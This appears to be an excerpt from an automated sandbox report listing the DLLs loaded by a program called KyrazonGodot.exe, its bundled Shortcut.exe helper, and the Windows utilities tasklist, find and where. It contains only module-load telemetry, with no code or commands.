Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\where.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rsaenh.dll
